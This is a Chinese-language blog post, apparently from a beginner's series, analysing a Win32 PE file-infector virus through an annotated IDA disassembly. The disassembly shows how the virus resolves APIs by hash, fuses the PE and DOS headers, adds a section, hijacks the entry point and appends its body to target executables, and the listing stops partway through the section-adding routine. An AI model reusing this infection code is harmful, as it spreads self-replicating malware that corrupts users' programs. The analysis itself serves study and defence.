菜鸟的病毒分析5 pe感染文件感染病毒

pe文件感染病毒
感觉好长时间没写了,这个pe结构着实让我很头痛,花了很长时间了解它。现在终于了解一点点了,动手分析一下win32下的简单病毒。具体的有关pe结构、seh结构的问题,看雪上有很多资料,可以去看看。win32留给病毒的位置不多,因为留给节表的空间往往不够:一个节表头的大小有40字节,如果自己想向pe文件添加一个节的话,就要先凑够这40个字节。这个病毒就是巧妙地将pe头与dos头融合在一起,留出足够的空间来添加一个节。
病毒行为:感染特定文件名的exe文件(这完全是因为作者想要控制病毒的感染力),把病毒体注入文件,在原程序之前运行病毒代码。
流程:查找kernel32,获取kernel32基址;获取病毒用到的kernel32 api;加载user32,获取用到的user32 api。打开文件,判断是否已被感染过;如果没有,判断头部剩余的空间能不能添加一个节,不能就对pe头进行变形,然后添加一个节。更改程序入口到病毒处,在文件尾追加病毒体。病毒发作的表现是弹出一个messagebox。
.Lonely:00401000 ;
.Lonely:00401000 ; +-------------------------------------------------------------------------+
.Lonely:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.Lonely:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.Lonely:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
.Lonely:00401000 ; +-------------------------------------------------------------------------+
.Lonely:00401000 ;
.Lonely:00401000 ; Input MD5 : 9FF89869A75E64324CC871CD7CAD018B
.Lonely:00401000
.Lonely:00401000 ; File Name : C:\26222\Virus.Lonely.exe
.Lonely:00401000 ; Format : Portable executable for 80386 (PE)
.Lonely:00401000 ; Imagebase : 400000
.Lonely:00401000 ; Section 1. (virtual address 00001000)
.Lonely:00401000 ; Virtual size : 000003BC ( 956.)
.Lonely:00401000 ; Section size in file : 00000400 ( 1024.)
.Lonely:00401000 ; Offset to raw data for section: 00000200
.Lonely:00401000 ; Flags E0000020: Text Executable Readable Writable
.Lonely:00401000 ; Alignment : default
.Lonely:00401000
.Lonely:00401000 .686p
.Lonely:00401000 .mmx
.Lonely:00401000 .model flat
.Lonely:00401000
.Lonely:00401000 ; ===========================================================================
.Lonely:00401000
.Lonely:00401000 ; Segment type: Pure code
.Lonely:00401000 ; Segment permissions: Read/Write/Execute
.Lonely:00401000 _Lonely segment para public 'CODE' use32
.Lonely:00401000 assume cs:_Lonely
.Lonely:00401000 ;org 401000h
.Lonely:00401000 assume es:nothing, ss:nothing, ds:_Lonely, fs:nothing, gs:nothing
.Lonely:00401000
.Lonely:00401000 ; =============== S U B R O U T I N E =======================================
.Lonely:00401000
.Lonely:00401000
.Lonely:00401000 public start
.Lonely:00401000 start proc near ; DATA XREF: .Lonely:0040126Er
.Lonely:00401000 ; Virus entry point. Saves the host's registers, then calls sub_40100C so
.Lonely:00401000 ; that the pushed return address (loc_401006) can be turned into a load
.Lonely:00401000 ; delta. The 3BCh bytes starting here are what the infector appends to a
.Lonely:00401000 ; target file (see the WriteFile at 00401276, which reads from start[ebp]).
.Lonely:00401000 pusha ; host register state; restored by the popa at 004010B0 / 004010C6
.Lonely:00401001 call near ptr sub_40100C ; pushes 00401006 as the return address
.Lonely:00401006
.Lonely:00401006 loc_401006: ; DATA XREF: sub_40100C+1o
.Lonely:00401006 int 3 ; bytes between the call and sub_40100C are skipped by the call; IDA decodes them as int 3
.Lonely:00401008 int 3 ; - software interrupt to invoke the debugger
.Lonely:0040100A int 3 ; - software interrupt to invoke the debugger
.Lonely:0040100A start endp ; sp-analysis failed
.Lonely:0040100A
.Lonely:0040100C
.Lonely:0040100C ; =============== S U B R O U T I N E =======================================
.Lonely:0040100C
.Lonely:0040100C
.Lonely:0040100C sub_40100C proc far ; CODE XREF: start+1p
.Lonely:0040100C ; Main body. Computes the load delta into ebp, resolves the kernel32 entries
.Lonely:0040100C ; of the hash table at closehandle, then calls loc_401031 with the address of
.Lonely:0040100C ; the "user32" string bytes as the pushed return value.
.Lonely:0040100C ; IDA's "proc far", the arg_C frame and the instructions after 0040102A are
.Lonely:0040100C ; artefacts: those bytes are string data, not code.
.Lonely:0040100C
.Lonely:0040100C arg_C = dword ptr 10h
.Lonely:0040100C
.Lonely:0040100C ; FUNCTION CHUNK AT .Lonely:00401062 SIZE 0000004D BYTES
.Lonely:0040100C
.Lonely:0040100C pop ebp ; ebp = return address pushed by start (runtime address of loc_401006)
.Lonely:0040100D sub ebp, offset loc_401006 ; ebp = load delta; 0 when the body runs at its original link address
.Lonely:00401013 call sub_4010C8 ; eax = module base found through the PEB loader list (kernel32 per the author)
.Lonely:00401018 lea edi, closehandle[ebp] ; edi = table of (name-hash, address-slot) dword pairs, zero hash terminates
.Lonely:0040101E push edi
.Lonely:0040101F push eax
.Lonely:00401020 call sub_4010E9 ; fill the table's address slots from that module's export names
.Lonely:00401020 ;
.Lonely:00401025 call loc_401031 ; the pushed return address points at the "user32" bytes below; loc_401031 consumes it as the LoadLibrary argument
.Lonely:0040102A jnz short near ptr loc_40109C+3 ; 75 73 — not code: bytes 0040102A..00401030 spell "user32",0
.Lonely:0040102C db 65h ; 'e'
.Lonely:0040102C jb short loc_401062 ; 72 33 — "r3"
.Lonely:0040102F xor al, [eax] ; 32 00 — "2",0
.Lonely:0040102F sub_40100C endp ; sp-analysis failed
.Lonely:0040102F
.Lonely:00401031
.Lonely:00401031 loc_401031: ; CODE XREF: sub_40100C+19p
.Lonely:00401031 ; Entered by the call at 00401025. The return address on the stack is the
.Lonely:00401031 ; address of "user32" and is consumed here as the library-load argument, so
.Lonely:00401031 ; control never goes back to 0040102A (assuming a one-argument stdcall callee).
.Lonely:00401031 call dword ptr [edi+54h] ; address slot at 004013B0 (hash 0A412FD89h); LoadLibraryA("user32") per the author's note
.Lonely:00401031 ;
.Lonely:00401034 push edi ; same hash table
.Lonely:00401035 push eax ; module base returned above
.Lonely:00401036 call sub_4010E9 ; resolve the user32 entries of the table
.Lonely:0040103B test ebp, ebp ; load delta: zero = this sample running at its link address, nonzero = body running inside an infected host
.Lonely:0040103D jz short loc_4010B3 ; original sample: go straight to the infection of "test.exe"
.Lonely:0040103F push 0 ; uType for the MessageBox call at 0040108F
.Lonely:00401041 call near ptr loc_401050+1 ; pushes 00401046 = "Virus Demo",0 (lpCaption) and lands on the call at 00401051
.Lonely:00401046 push esi ; 56h 'V' — bytes 00401046..00401050 are the string "Virus Demo",0, not code
.Lonely:00401047 imul esi, [edx+75h], 65442073h ; "irus De"
.Lonely:0040104E insd ; 'm'
.Lonely:0040104F outsd ; 'o'
.Lonely:00401050
.Lonely:00401050 loc_401050: ; CODE XREF: .Lonely:00401041p
.Lonely:00401050 add al, ch ; 00 E8: string terminator, then E8 = call 0040108D (rel32 37h); that call pushes 00401056 (lpText)
.Lonely:00401052 aaa ; 37h = low byte of that rel32
.Lonely:00401052 ; ---------------------------------------------------------------------------
.Lonely:00401053 db 0 ; rest of the rel32
.Lonely:00401054 dd 79620000h, 6966783Ah, 68206873h ; 00 00, then text "by:xfish h"...
.Lonely:00401060 db 2 dup(74h) ; "tt" — the text runs on through 0040108C: "by:xfish http://www.pediy.com http://www.hacker.com.cn",0
.Lonely:00401062 ; ---------------------------------------------------------------------------
.Lonely:00401062 ; START OF FUNCTION CHUNK FOR sub_40100C
.Lonely:00401062
.Lonely:00401062 loc_401062: ; CODE XREF: sub_40100C+20j
.Lonely:00401062 ; 00401062..0040108C is the tail of the text string whose address is pushed
.Lonely:00401062 ; by the call at 00401051. IDA's "function chunk" and the cross-references
.Lonely:00401062 ; into it come from decoding those string bytes as branches.
.Lonely:00401062 jo short near ptr loc_40109C+2 ; "p:"
.Lonely:00401064 das ; '/'
.Lonely:00401065 das ; '/'
.Lonely:00401066 ja short loc_4010DF ; "ww"
.Lonely:00401068 ja short loc_401098 ; "w."
.Lonely:0040106A jo short near ptr loc_4010D0+1 ; "pe"
.Lonely:0040106C imul edi, fs:[ecx+2Eh], 206D6F63h ; "diy.com "
.Lonely:00401074 push 3A707474h ; "http:"
.Lonely:00401079 das ; '/'
.Lonely:0040107A das ; '/'
.Lonely:0040107B ja short near ptr loc_4010F1+3 ; "ww"
.Lonely:0040107D ja short near ptr locret_4010AC+1 ; "w."
.Lonely:0040107F push 656B6361h ; "hacke"
.Lonely:00401084 jb short near ptr loc_4010B3+1 ; "r."
.Lonely:00401086 arpl [edi+6Dh], bp ; "com"
.Lonely:00401089 arpl cs:[esi+0], bp ; ".cn",0 — end of the string; real code resumes at 0040108D
.Lonely:0040108D push 0 ; hWnd = 0
.Lonely:0040108F call dword ptr [edi+5Ch] ; address slot at 004013B8 (hash 14D14C51h); four arguments (0, text, "Virus Demo", 0) match MessageBoxA, the "病毒发作" the author describes
.Lonely:00401092 push ss:off_401357[ebp] ; host's original entry point VA, stored there by the infector at 00401215
.Lonely:00401098
.Lonely:00401098 loc_401098: ; CODE XREF: sub_40100C+5Cj
.Lonely:00401098 pop [esp+0Ch+arg_C] ; = [esp+1Ch]: the saved-EAX slot of start's pusha frame (the call return address was consumed at 00401031)
.Lonely:0040109C
.Lonely:0040109C loc_40109C: ; CODE XREF: sub_40100C:loc_401062j
.Lonely:0040109C ; sub_40100C+1Ej
.Lonely:0040109C call near ptr loc_4010AA+1 ; pushes 004010A1 = "test2.exe",0 and lands on the call at 004010AB
.Lonely:004010A1 jz short near ptr loc_401107+1 ; "te" — string bytes, not code
.Lonely:004010A3 jnb short loc_401119 ; "st"
.Lonely:004010A5 xor ch, [esi] ; "2."
.Lonely:004010A7 db 65h ; 'e'
.Lonely:004010A7 js short near ptr loc_40110E+1 ; "xe"
.Lonely:004010AA
.Lonely:004010AA loc_4010AA: ; CODE XREF: sub_40100C:loc_40109Cp
.Lonely:004010AA add al, ch ; 00 E8: string terminator, then E8 = call 0040117A (rel32 0CAh): the infection routine, which ends with retn 4
.Lonely:004010AC
.Lonely:004010AC locret_4010AC: ; CODE XREF: sub_40100C+71j
.Lonely:004010AC retf 0 ; 0CAh 00 00 = bytes of that rel32, not a retf
.Lonely:004010AC ; END OF FUNCTION CHUNK FOR sub_40100C
.Lonely:004010AC ; ---------------------------------------------------------------------------
.Lonely:004010AF align 10h ; last rel32 byte (00)
.Lonely:004010B0 popa ; restore the host's registers; eax = original entry point (patched at 00401098)
.Lonely:004010B1 push eax
.Lonely:004010B2 retn ; transfer control to the host's original entry point
.Lonely:004010B3 ; ---------------------------------------------------------------------------
.Lonely:004010B3
.Lonely:004010B3 loc_4010B3: ; CODE XREF: .Lonely:0040103Dj
.Lonely:004010B3 ; sub_40100C+78j
.Lonely:004010B3 ; Original-sample path (load delta == 0): infect "test.exe", then return
.Lonely:004010B3 ; from start, i.e. the sample exits.
.Lonely:004010B3 call near ptr loc_4010C0+1 ; pushes 004010B8 = "test.exe",0 and lands on the call at 004010C1
.Lonely:004010B8 jz short near ptr loc_40111C+3 ; "te" — string bytes, not code
.Lonely:004010BA jnb short near ptr loc_40112F+1 ; "st"
.Lonely:004010BC db 2Eh, 65h ; ".e"
.Lonely:004010BC js short near ptr loc_401124+1 ; "xe"
.Lonely:004010C0
.Lonely:004010C0 loc_4010C0: ; CODE XREF: .Lonely:loc_4010B3p
.Lonely:004010C0 add al, ch ; 00 E8: string terminator, then E8 = call 0040117A (rel32 0B4h). IDA mis-decoded this; as the author notes, the real target is 0040117Ah
.Lonely:004010C2 mov ah, 0 ; 0B4h 00 = low bytes of that rel32
.Lonely:004010C2 ; ---------------------------------------------------------------------------
.Lonely:004010C4 dd 0C3610000h ; 00 00 (rest of the rel32), then 61h popa / 0C3h retn: restore registers and return from start
.Lonely:004010C8
.Lonely:004010C8 ; =============== S U B R O U T I N E =======================================
.Lonely:004010C8
.Lonely:004010C8
.Lonely:004010C8 sub_4010C8 proc near ; CODE XREF: sub_40100C+7p
.Lonely:004010C8 ; Returns in eax the DllBase of the second entry of the PEB loader's
.Lonely:004010C8 ; InInitializationOrderModuleList. The author treats this as kernel32;
.Lonely:004010C8 ; that holds for the Windows versions of the sample's era, on later
.Lonely:004010C8 ; versions the second entry is presumably a different module.
.Lonely:004010C8 ; The xrefs from sub_40100C into this routine are artefacts of string bytes.
.Lonely:004010C8 sub eax, eax ; eax = 0
.Lonely:004010CA mov eax, fs:[eax+30h] ; TEB+30h = PEB pointer
.Lonely:004010CE test eax, eax
.Lonely:004010D0
.Lonely:004010D0 loc_4010D0: ; CODE XREF: sub_40100C+5Ej
.Lonely:004010D0 js short loc_4010DF ; pointer with the high bit set: take the alternate walk below
.Lonely:004010D2 mov eax, [eax+0Ch] ; PEB.Ldr
.Lonely:004010D5 mov eax, [eax+1Ch] ; Ldr.InInitializationOrderModuleList.Flink (first entry)
.Lonely:004010D8 mov eax, [eax] ; second entry
.Lonely:004010DA mov eax, [eax+8] ; DllBase of that entry
.Lonely:004010DD jmp short locret_4010E8
.Lonely:004010DF ; ---------------------------------------------------------------------------
.Lonely:004010DF
.Lonely:004010DF loc_4010DF: ; CODE XREF: sub_40100C+5Aj
.Lonely:004010DF ; sub_4010C8:loc_4010D0j
.Lonely:004010DF mov eax, [eax+34h] ; alternate walk, presumably for non-NT (9x-style) systems — NOTE(review): offsets not verifiable from this listing
.Lonely:004010E2 lea eax, [eax+7Ch]
.Lonely:004010E5 mov eax, [eax+3Ch]
.Lonely:004010E8
.Lonely:004010E8 locret_4010E8: ; CODE XREF: sub_4010C8+15j
.Lonely:004010E8 retn
.Lonely:004010E8 sub_4010C8 endp
.Lonely:004010E8
.Lonely:004010E9
.Lonely:004010E9 ; =============== S U B R O U T I N E =======================================
.Lonely:004010E9
.Lonely:004010E9
.Lonely:004010E9 sub_4010E9 proc near ; CODE XREF: sub_40100C+14p
.Lonely:004010E9 ; .Lonely:00401036p
.Lonely:004010E9 ; Resolve APIs by export-name hash (the "搜索api地址" step).
.Lonely:004010E9 ; arg_0 = module base, arg_4 = table of (hash dword, address dword) pairs
.Lonely:004010E9 ; terminated by a zero hash. For every export name whose hash matches a
.Lonely:004010E9 ; table entry the function's VA is written into the dword after the hash.
.Lonely:004010E9 ; Hash: edx = 0; for each name byte: edx = rol(edx, 3) ^ byte.
.Lonely:004010E9 ; Only the first matching entry is filled per export name. No return value;
.Lonely:004010E9 ; all registers are preserved. The same table is scanned for every module
.Lonely:004010E9 ; passed in, so nothing ties a hash to a particular DLL.
.Lonely:004010E9 ; Cross-references from sub_40100C / .Lonely:004010xx are artefacts of
.Lonely:004010E9 ; string bytes being decoded as branches.
.Lonely:004010E9
.Lonely:004010E9 var_24 = dword ptr -24h
.Lonely:004010E9 arg_0 = dword ptr 4
.Lonely:004010E9 arg_4 = dword ptr 8
.Lonely:004010E9
.Lonely:004010E9 pusha
.Lonely:004010EA mov ebx, [esp+20h+arg_0] ; ebx = module base
.Lonely:004010EE mov edx, [ebx+3Ch] ; e_lfanew
.Lonely:004010F1
.Lonely:004010F1 loc_4010F1: ; CODE XREF: sub_40100C+6Fj
.Lonely:004010F1 mov esi, [ebx+edx+78h] ; export directory RVA (DataDirectory[0])
.Lonely:004010F5 lea esi, [esi+ebx+18h] ; &IMAGE_EXPORT_DIRECTORY.NumberOfNames
.Lonely:004010F9 lodsd
.Lonely:004010FA xchg eax, ecx ; ecx = NumberOfNames (outer loop count)
.Lonely:004010FB lodsd
.Lonely:004010FC add eax, ebx
.Lonely:004010FE xchg eax, ebp ; ebp = AddressOfFunctions (VA)
.Lonely:004010FF lodsd
.Lonely:00401100 add eax, ebx
.Lonely:00401102 xchg eax, edx ; edx = AddressOfNames (VA)
.Lonely:00401103 lodsd
.Lonely:00401104 add eax, ebx
.Lonely:00401106 push eax ; var_24 = AddressOfNameOrdinals (VA), advanced by 2 per name
.Lonely:00401107
.Lonely:00401107 loc_401107: ; CODE XREF: sub_40100C+95j
.Lonely:00401107 mov esi, edx ; esi walks the name-RVA array
.Lonely:00401109
.Lonely:00401109 loc_401109: ; CODE XREF: sub_4010E9:loc_40113Cj
.Lonely:00401109 lodsd
.Lonely:0040110A add eax, ebx ; eax = current export name (VA)
.Lonely:0040110C xor edx, edx ; hash accumulator
.Lonely:0040110E
.Lonely:0040110E loc_40110E: ; CODE XREF: sub_4010E9+2Ej
.Lonely:0040110E ; sub_40100C+9Bj
.Lonely:0040110E rol edx, 3
.Lonely:00401111 xor dl, [eax]
.Lonely:00401113 inc eax
.Lonely:00401114 cmp byte ptr [eax], 0
.Lonely:00401117 jnz short loc_40110E ; until the NUL terminator
.Lonely:00401119
.Lonely:00401119 loc_401119: ; CODE XREF: sub_40100C+97j
.Lonely:00401119 mov eax, [esp+24h+var_24] ; eax = &ordinal of this name
.Lonely:0040111C
.Lonely:0040111C loc_40111C: ; CODE XREF: .Lonely:004010B8j
.Lonely:0040111C add [esp+24h+var_24], 2 ; next ordinal
.Lonely:00401120 mov edi, [esp+24h+arg_4] ; edi = start of the hash table
.Lonely:00401124
.Lonely:00401124 loc_401124: ; CODE XREF: sub_4010E9+51j
.Lonely:00401124 ; .Lonely:004010BCj
.Lonely:00401124 cmp [edi], edx ; table hash == computed hash?
.Lonely:00401126 jnz short loc_401135
.Lonely:00401128 movzx eax, word ptr [eax] ; ordinal
.Lonely:0040112B mov eax, [ebp+eax*4+0] ; AddressOfFunctions[ordinal]
.Lonely:0040112F
.Lonely:0040112F loc_40112F: ; CODE XREF: .Lonely:004010BAj
.Lonely:0040112F add eax, ebx ; function VA
.Lonely:00401131 scasd ; skip the hash dword
.Lonely:00401132 stosd ; store the VA in the slot that follows it
.Lonely:00401133 jmp short loc_40113C ; stop scanning the table for this name
.Lonely:00401135 ; ---------------------------------------------------------------------------
.Lonely:00401135
.Lonely:00401135 loc_401135: ; CODE XREF: sub_4010E9+3Dj
.Lonely:00401135 scasd ; skip the (hash, slot) pair
.Lonely:00401136 scasd
.Lonely:00401137 cmp dword ptr [edi], 0 ; zero hash terminates the table
.Lonely:0040113A jnz short loc_401124
.Lonely:0040113C
.Lonely:0040113C loc_40113C: ; CODE XREF: sub_4010E9+4Aj
.Lonely:0040113C loop loc_401109 ; next export name
.Lonely:0040113E pop ecx ; discard var_24
.Lonely:0040113F popa
.Lonely:00401140 retn 8
.Lonely:00401140 sub_4010E9 endp
.Lonely:00401140
.Lonely:00401143
.Lonely:00401143 ; =============== S U B R O U T I N E =======================================
.Lonely:00401143
.Lonely:00401143 ; Is the buffer a PE file?
.Lonely:00401143
.Lonely:00401143 sub_401143 proc near ; CODE XREF: .Lonely:004011EEp
.Lonely:00401143 ; arg_0 = address of the file image in memory.
.Lonely:00401143 ; Returns CF=1 when the buffer starts with "MZ" and has "PE" at e_lfanew,
.Lonely:00401143 ; CF=0 otherwise. e_lfanew is used without any range check against the
.Lonely:00401143 ; buffer size. Clobbers edx.
.Lonely:00401143
.Lonely:00401143 arg_0 = dword ptr 4
.Lonely:00401143
.Lonely:00401143 mov edx, [esp+arg_0]
.Lonely:00401147 cmp word ptr [edx], 'ZM' ; IMAGE_DOS_SIGNATURE "MZ"
.Lonely:0040114C jnz short loc_40115C
.Lonely:0040114E add edx, [edx+3Ch] ; edx = buffer + e_lfanew
.Lonely:00401151 cmp word ptr [edx], 'EP' ; "PE" signature
.Lonely:00401156 jnz short loc_40115C
.Lonely:00401158 stc ; CF=1: looks like a PE image
.Lonely:00401159 retn 4
.Lonely:0040115C ; ---------------------------------------------------------------------------
.Lonely:0040115C
.Lonely:0040115C loc_40115C: ; CODE XREF: sub_401143+9j
.Lonely:0040115C ; sub_401143+13j
.Lonely:0040115C clc ; CF=0: not a PE image
.Lonely:0040115D retn 4
.Lonely:0040115D sub_401143 endp
.Lonely:0040115D
.Lonely:00401160
.Lonely:00401160 ; =============== S U B R O U T I N E =======================================
.Lonely:00401160
.Lonely:00401160
.Lonely:00401160 sub_401160 proc near ; CODE XREF: .Lonely:00401180p
.Lonely:00401160 ; Is the named file a 32-bit Windows binary?
.Lonely:00401160 ; arg_0 = file name. Calls the API in slot getbinarytypea_0 with
.Lonely:00401160 ; (name, &type) and returns CF=1 when the reported type is 0
.Lonely:00401160 ; (SCS_32BIT_BINARY), CF=0 otherwise. The API's own return value is
.Lonely:00401160 ; overwritten by the pop, so a failed call (type left at 0) also yields CF=1.
.Lonely:00401160 ; Clobbers eax.
.Lonely:00401160
.Lonely:00401160 arg_0 = dword ptr 4
.Lonely:00401160
.Lonely:00401160 push 0 ; output variable lpBinaryType, preset to 0
.Lonely:00401162 push esp ; &lpBinaryType
.Lonely:00401163 push [esp+8+arg_0] ; lpApplicationName
.Lonely:00401167 call ss:getbinarytypea_0[ebp] ; GetBinaryTypeA per the author's label
.Lonely:0040116D pop eax ; eax = binary type written by the API
.Lonely:0040116E test eax, eax
.Lonely:00401170 jnz short loc_401176
.Lonely:00401172 stc ; CF=1: type 0 = 32-bit Windows binary
.Lonely:00401173 retn 4
.Lonely:00401176 ; ---------------------------------------------------------------------------
.Lonely:00401176
.Lonely:00401176 loc_401176: ; CODE XREF: sub_401160+10j
.Lonely:00401176 clc ; CF=0: some other type
.Lonely:00401177 retn 4
.Lonely:00401177 sub_401160 endp
.Lonely:00401177
.Lonely:0040117A ; ---------------------------------------------------------------------------
.Lonely:0040117A ; Infection routine (IDA did not recognise it as a proc; it is reached by
.Lonely:0040117A ; the calls hidden at 004010AB and 004010C1). One stack argument: the target
.Lonely:0040117A ; file name ("test.exe" / "test2.exe"); returns with retn 4.
.Lonely:0040117A ; Steps: 32-bit check, open, read the whole file into memory, PE check, add a
.Lonely:0040117A ; section (sub_40129C), redirect AddressOfEntryPoint to it, write the image
.Lonely:0040117A ; back, then append the 3BCh-byte body. No check is made for an already
.Lonely:0040117A ; infected file beyond what sub_40129C does.
.Lonely:0040117A pusha
.Lonely:0040117B mov esi, [esp+24h] ; esi = file name argument (20h pusha frame + return address)
.Lonely:0040117F push esi
.Lonely:00401180 call sub_401160 ; CF=1 if the file is reported as a 32-bit binary
.Lonely:00401180 ;
.Lonely:00401185 jnb loc_401298 ; not 32-bit: do nothing
.Lonely:00401185 ;
.Lonely:0040118B sub eax, eax
.Lonely:0040118D push eax ; hTemplateFile = 0
.Lonely:0040118E push eax ; dwFlagsAndAttributes = 0
.Lonely:0040118F push 3 ; OPEN_EXISTING
.Lonely:00401191 push eax ; lpSecurityAttributes = 0
.Lonely:00401192 push 2 ; dwShareMode = FILE_SHARE_WRITE
.Lonely:00401194 push 0C0000000h ; GENERIC_READ | GENERIC_WRITE
.Lonely:00401199 push esi ; lpFileName
.Lonely:0040119A call dword ptr ss:creatfile_1[ebp] ; open the file (CreateFileA argument pattern)
.Lonely:004011A0 cmp eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE: open failed, skip to the end
.Lonely:004011A0 ; on success eax is the file handle
.Lonely:004011A3 jz loc_401298
.Lonely:004011A9 xchg eax, ebx ; ebx = file handle
.Lonely:004011AA push 0 ; lpFileSizeHigh = 0
.Lonely:004011AC push ebx
.Lonely:004011AD call ss:getfilesize[ebp] ; eax = file size, used for the read below
.Lonely:004011B3 push eax ; keep the size across the allocation call
.Lonely:004011B4 push 4 ; PAGE_READWRITE
.Lonely:004011B6 push 1000h ; MEM_COMMIT
.Lonely:004011BB push eax ; dwSize = file size
.Lonely:004011BC push 0 ; lpAddress = 0
.Lonely:004011BE call ss:virtualalloc_0[ebp] ; allocate a buffer for the whole file
.Lonely:004011C4 pop edx ; edx = file size
.Lonely:004011C5 test eax, eax
.Lonely:004011C7 jz loc_401291 ; allocation failed: just close the handle
.Lonely:004011CD xchg eax, edi ; edi = buffer
.Lonely:004011CE mov dword ptr ss:(loc_401285+1)[ebp], edx ; self-modifying: store the size in the imm32 of the push at loc_401285; read back at 004011D7, 00401231 and used as the free size at 00401280
.Lonely:004011D4 push 0 ; lpNumberOfBytesRead variable — NOTE(review): this dword is never popped; same pattern at 00401228 and 00401266, so esp looks unbalanced at the popa below; verify in a debugger
.Lonely:004011D6 push esp ; &lpNumberOfBytesRead
.Lonely:004011D7 push dword ptr ss:(loc_401285+1)[ebp] ; nNumberOfBytesToRead = file size
.Lonely:004011DD push edi ; lpBuffer
.Lonely:004011DE push ebx ; hFile
.Lonely:004011DF call ss:readfile[ebp] ; read the whole file
.Lonely:004011E5 test eax, eax
.Lonely:004011E7 jz loc_401280 ; read failed: free buffer, close handle
.Lonely:004011ED push edi
.Lonely:004011EE call sub_401143 ; is the buffer a PE file?
.Lonely:004011F3 jnb loc_401280 ; not PE: free buffer, close handle
.Lonely:004011F9 push 3BCh ; size of the new section = size of the virus body
.Lonely:004011FE push edi
.Lonely:004011FF call sub_40129C ; add the section; eax = its file offset (0 on failure), edx = its RVA
.Lonely:00401204 test eax, eax
.Lonely:00401206 jz short loc_401280 ; no room / already relocated header: give up
.Lonely:00401208 mov eax, edi
.Lonely:0040120A add eax, [eax+3Ch] ; edi is the start of the file image; eax = PE header
.Lonely:0040120D mov ecx, edx ; new entry RVA = RVA of the added section
.Lonely:0040120F xchg ecx, [eax+28h] ; swap into AddressOfEntryPoint; ecx = original entry RVA
.Lonely:00401212 add ecx, [eax+34h] ; + ImageBase = original entry VA
.Lonely:00401215 mov ss:off_401357[ebp], ecx ; saved in the body, read at 00401092 when the body runs in the infected host
.Lonely:0040121B push 0 ; dwMoveMethod = FILE_BEGIN
.Lonely:0040121D push 0 ; lpDistanceToMoveHigh
.Lonely:0040121F push 0 ; lDistanceToMove
.Lonely:00401221 push ebx
.Lonely:00401222 call ss:setendoffile[ebp] ; move the file pointer to the start of the file (four arguments: SetFilePointer pattern, despite the label)
.Lonely:00401228 push 0 ; lpNumberOfBytesWritten variable (not popped, see note above)
.Lonely:0040122A push esp
.Lonely:0040122B lea eax, (loc_401285+1)[ebp]
.Lonely:00401231 push dword ptr [eax] ; nNumberOfBytesToWrite = file size
.Lonely:00401233 push edi
.Lonely:00401234 push ebx
.Lonely:00401235 call ss:writefile_0[ebp] ; write the modified image back over the file
.Lonely:0040123B test eax, eax
.Lonely:0040123D jz short loc_401280
.Lonely:0040123F push 2 ; FILE_END
.Lonely:00401241 push 0
.Lonely:00401243 push 3BCh ; distance = body size
.Lonely:00401248 push ebx
.Lonely:00401249 call ss:setendoffile[ebp] ; file pointer = end of file + 3BCh
.Lonely:0040124F push ebx
.Lonely:00401250 call ss:setfilepointer[ebp] ; one argument: SetEndOfFile pattern — grows the file by 3BCh (the two labels appear swapped)
.Lonely:00401256 push 1 ; FILE_CURRENT
.Lonely:00401258 push 0
.Lonely:0040125A push 0FFFFFC44h ; -3BCh
.Lonely:0040125F push ebx
.Lonely:00401260 call ss:setendoffile[ebp] ; back to the old end of file
.Lonely:00401266 push 0 ; lpNumberOfBytesWritten variable (not popped, see note above)
.Lonely:00401268 push esp
.Lonely:00401269 push 3BCh ; body size
.Lonely:0040126E lea eax, start[ebp] ; body source = this running copy, from start
.Lonely:00401274 push eax
.Lonely:00401275 push ebx
.Lonely:00401276 call ss:writefile_0[ebp] ; append the virus body
.Lonely:0040127C test eax, eax
.Lonely:0040127E jz short $+2 ; no-op: both outcomes fall through
.Lonely:00401280
.Lonely:00401280 loc_401280: ; CODE XREF: .Lonely:004011E7j
.Lonely:00401280 ; .Lonely:004011F3j ...
.Lonely:00401280 push 4000h ; MEM_DECOMMIT
.Lonely:00401285
.Lonely:00401285 loc_401285: ; DATA XREF: .Lonely:loc_401285o
.Lonely:00401285 ; .Lonely:004011CEw ...
.Lonely:00401285 push offset loc_401285 ; imm32 patched at 004011CE with the file size; the offset shown is only the placeholder
.Lonely:0040128A push edi ; buffer
.Lonely:0040128B call ss:writefile[ebp] ; three arguments (address, size, 4000h): VirtualFree pattern, despite the label
.Lonely:00401291
.Lonely:00401291 loc_401291: ; CODE XREF: .Lonely:004011C7j
.Lonely:00401291 push ebx
.Lonely:00401292 call dword ptr ss:unk_401360[ebp] ; slot following the hash labelled closehandle: CloseHandle(file)
.Lonely:00401298
.Lonely:00401298 loc_401298: ; CODE XREF: .Lonely:00401185j
.Lonely:00401298 ; .Lonely:004011A3j
.Lonely:00401298 popa
.Lonely:00401299 retn 4 ; pops the file-name argument
.Lonely:0040129C
.Lonely:0040129C ; =============== S U B R O U T I N E =======================================
.Lonely:0040129C
.Lonely:0040129C
.Lonely:0040129C sub_40129C proc near ; CODE XREF: .Lonely:004011FFp
.Lonely:0040129C ; Add a section header to the PE image in memory.
.Lonely:0040129C ; arg_0 = image buffer, arg_4 = size of the new section (3BCh).
.Lonely:0040129C ; If fewer than 28h bytes are free between the end of the section table and
.Lonely:0040129C ; the first section's raw data, the PE header plus section table is moved
.Lonely:0040129C ; down to file offset 0Ch (overlapping the DOS header) and e_lfanew set to
.Lonely:0040129C ; 0Ch — the "pe头与dos头融合" trick; if the header is already at 0Ch the
.Lonely:0040129C ; routine fails. The new section is named ".xfish", has
.Lonely:0040129C ; VirtualSize = SizeOfRawData = arg_4, VirtualAddress = old SizeOfImage,
.Lonely:0040129C ; PointerToRawData = end of the previous section's raw data, Characteristics
.Lonely:0040129C ; 0E0000020h; SizeOfImage grows by arg_4. No rounding to FileAlignment or
.Lonely:0040129C ; SectionAlignment is done. The Bound Import directory is zeroed first.
.Lonely:0040129C ; Returns via the pusha frame: eax = new PointerToRawData (0 on failure),
.Lonely:0040129C ; edx = new section RVA. These header traits identify infected files.
.Lonely:0040129C
.Lonely:0040129C var_40 = dword ptr -40h
.Lonely:0040129C var_3C = dword ptr -3Ch
.Lonely:0040129C var_C = dword ptr -0Ch
.Lonely:0040129C var_4 = dword ptr -4
.Lonely:0040129C arg_0 = dword ptr 4
.Lonely:0040129C arg_4 = dword ptr 8
.Lonely:0040129C
.Lonely:0040129C pusha
.Lonely:0040129D mov ebx, [esp+20h+arg_0] ; ebx = image buffer
.Lonely:004012A1 mov esi, ebx
